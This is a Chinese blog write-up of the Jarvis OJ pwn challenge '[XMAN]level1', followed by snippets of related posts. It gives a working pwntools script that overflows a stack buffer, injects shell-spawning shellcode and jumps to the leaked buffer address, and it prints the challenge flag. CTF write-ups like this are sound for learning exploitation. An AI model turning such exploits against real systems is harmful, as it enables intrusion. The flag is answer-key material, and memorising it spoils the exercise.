Jarvis OJ-PWN-[XMAN]level1 wp

最新推荐文章于 2022-05-18 11:32:02 发布
最新推荐文章于 2022-05-18 11:32:02 发布
阅读量1.2k 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: Jarvis OJ 文章标签: pwn 逆向 破解 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Retrovich/article/details/82857948
本文详细解析了PWN2挑战的解决步骤,包括使用checksec查看保护机制、利用IDA分析伪代码、找到溢出点并构造payload,最终通过python脚本实现攻击。适合对逆向工程和漏洞利用感兴趣的读者。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

地址:nc pwn2.jarvisoj.com 9877

第一步:用checksec看开启了哪些保护

在这里插入图片描述
32位的 程序编译时关了栈不可执行保护

第二步:用IDA看伪代码

进去之后F5看到主函数
在这里插入图片描述
跟进vulnerable_function()函数
在这里插入图片描述

第三步:找到溢出点并加以分析

我们需要覆盖函数的返回地址
将其地址覆盖成shellcode的返回地址
这道题不像level0 里面有system函数 所以我们需要自己写shellcode
刚开始的检查保护中可以看到 没有开启NX保护 所以可以直接执行shellcode

也就是说 我们首先要知道buf的首地址 这样才能计算出shellcode的偏移 才能跳转到正确的地址
buf的首地址我们可以直接看到
在这里插入图片描述

- - - - - - - - loading - - - - - - - 
 
在这里插入图片描述

第四步:构造payload 完善python脚本

因此我们的payload应该是

distance=0x88+4
shellcode=""
junk='a'*(distance-len(shellcode))
address=" "
payload=shellcode+junk+address

下面我们来完善python脚本

from pwn import *
context(arch = 'i386', os = 'linux')

shellcode = asm(shellcraft.sh())#用函数shellcraft.sh()直接生成shellcode
#asm
io = remote('pwn2.jarvisoj.com', 9877)
text = io.recvline()[14: -2]

buf_addr = int(text, 16)

payload = shellcode + 'a' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()
第五步:cat flag

在虚拟机中创建文件,重命名为xxx.py文件
在这里插入图片描述

CTF{82c2aa534a9dede9c3a0045d0fec8617}
。゚(゚´ω`゚)゚。

如果python脚本看不懂的话 应该是pwntools没有掌握熟练
或者是汇编语言没有好好看(别问我为什么知道…

也可以用gdb的插件peda来进行动态调试 不过我还没学会(哭

(Jarvis Oj)(Pwn) level1
Nothing
04-18 1353
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
溢出利用之return to dl-resolve实例
M021的专栏
10-07 3587
最近学习了一下漏洞原理与利用,学习到溢出漏洞利用的一些技巧,记录下自己的学习心得。关于return to dl-resolve的原理,网上有许多的文章已经写的很清楚了,就赘述。本文主要是根据return to dl-resolve的原理,实现32位和64位环境下的漏洞利用。
PWN_JarvisOJ_Level1
michaelinfinity的博客
03-13 844
首先nc一下 之后我们来看ida反编译 在“Hello,World!\n”之前有一个vulnerable_function,进去之后查看一下这个函数 可以看出来刚刚出现的奇怪的地址是buf的首地址(%p是返回参数地址的),那么我们就要查看一下buf。 从中能看出buf有0x88的字节,并且返回指令在+0004的位置,所以需要填充0x88+4的字节 这个题目中没有syste...
18.9.18 Jarvis OJ PWN----[XMAN]level1
qq_42192672的博客
09-18 262
拖进IDA 这次先是一个vulnerable_function函数,再是一个write函数 查看保护机制,发现没有开启,大佬说保护机制没开启,就可以用shellcode啦 接下来看函数内部 可以看到buf的缓冲区大小为0x100个字节,但是其偏移量是0x88个字节 在0x88个字节中首先要留出shellcode的空间(注意这里是32位的) 最终返回的地址显然也要返回到shell...
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 496
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
jarvisoj pwn level1
Joey_l的博客
07-31 470
https://www.jarvisoj.com/challenges 拿到程序后先file可知为32位和动态链接 file level1 然后checksec检查保护机制 checksec level1 拖入ida查看,在vulnerable_function()函数的printf()处存在注入点 结构: 低地址→高地址 buf→ebp→eip(返回地址) 思路:没有s...
pwn 练习5月份
zip471642048的博客
05-18 637
level2 题目地址 : https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1 buf的大小是0x88,但是给了0x100所以会造成溢出 正好有/bin/sh字符,也有system函数,那我们只需要找到他两的地址构造rop就行 /bin/sh => 0x0804A024 systme_addr => 0x08048320 exp from pw
溢出利用之return to dl-resolve payload 构造原理(一)
M021的专栏
11-02 3409
前段时间,学习了return to dl-resolve 方法,并且分别在32位应用和64位应用上实践了一番,现记录下我的学习心得。
溢出利用之DynELF实例
M021的专栏
10-07 4239
无libc库函数时,利用DynELF实现漏洞利用
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 922
JarvisOJ-PWN-Level 先checksec一下: 发现NX保护没有打开,也就是堆代码没有进行保护,那么就就题目很可能就是要输入shellcode在里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
Jarvis OJ PWN level1
qq_43409582的博客
09-13 289
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;先看一下保护: 没开保护。 主函数中没写啥东西。。。 接着打开主函数中调用的function, 很明显的一个...
JarvisOJ PWN level1 wp
苗_的博客
01-08 287
level1 checksec看一下保护,几乎没什么保护措施: 先拖进IDA里面看一下(f5大法好),发现溢出点: f12没发现"/bin/sh",看一下printf函数会把buf的地址输出出来,我们将它截取,并保存在buf_addr中。由于NX是关闭的状态,也就是说我们把shellcode写进buf里面,函数返回时跳转回buf的位置,就可以执行shellcode了。因此我们把sh...
jarvisoj_level1
m0sway的博客
12-03 2372
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 209
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
Jarvis oj level1 wp
ditto的博客
12-30 337
看下防护 啥也没开。 放IDA里看下: 很显然,利用泄露的数组的首地址来写通解,就用管ASLR了。 exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9877") a.recvuntil("What's this:") addr=a.recvuntil(&
jarvisoj-level1
qq_35661990的博客
11-08 370
先看一下有什么保护 什么保护都没开起来。 放进IDA里看一下 vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; main函数里就三行,进入vulnerable_function()函数看一下 char buf; // [esp+0h] [ebp-88h] printf("W...
[BUUCTF]PWN——jarvisoj_level1
BangSen1的博客
03-31 289
jarvisoj_level1 例行检查,32位,未开启任何保护。 运行一下,给了一个地址 0xffef96b0 用IDA打开,查看主函数 查看function函数。由此我们可以知道 bufadddr= 0xffef96b0, buf存在溢出漏洞。由于题目并没有开启任何保护。所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可获取shell。 ...
Jarvis OJ level1
九层台
07-06 840
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值